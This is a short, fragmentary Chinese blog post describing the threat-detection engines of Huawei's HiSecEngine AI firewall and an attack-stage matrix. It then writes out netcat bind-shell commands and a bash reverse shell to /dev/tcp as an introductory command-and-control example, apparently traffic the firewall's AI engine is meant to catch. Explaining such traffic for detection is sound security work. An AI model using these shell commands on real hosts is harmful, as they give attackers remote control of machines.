赞
踩
最近被华为HiSecEngine[1] AI防火墙刷爆了朋友圈,它内置了三大威胁防御引擎,分别是NGE、CDE和AIE。以下是自己的理解,可能说的不对,欢迎留言讨论。
大白话说:就是特征库检测
大白话说:就是沙箱检测
大白话说:就是AI行为检测
对AIE引擎颇有兴趣,有监督的有3类:
无监督的有1类:
攻击矩阵:
信息收集、扫描探测、边界突破、建立驻点、权限提升、内部转移、数据盗取、数据外发。
入门级的C&C场景[2]:
点个赞呗,待会来写高级部分
nc -lvvp 2019 -t -e /bin/bash
nc 192.168.0.105 2019
nc -vlp 2019
bash -i >& /dev/tcp/192.168.0.103/2019 0>&1
带货环节:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。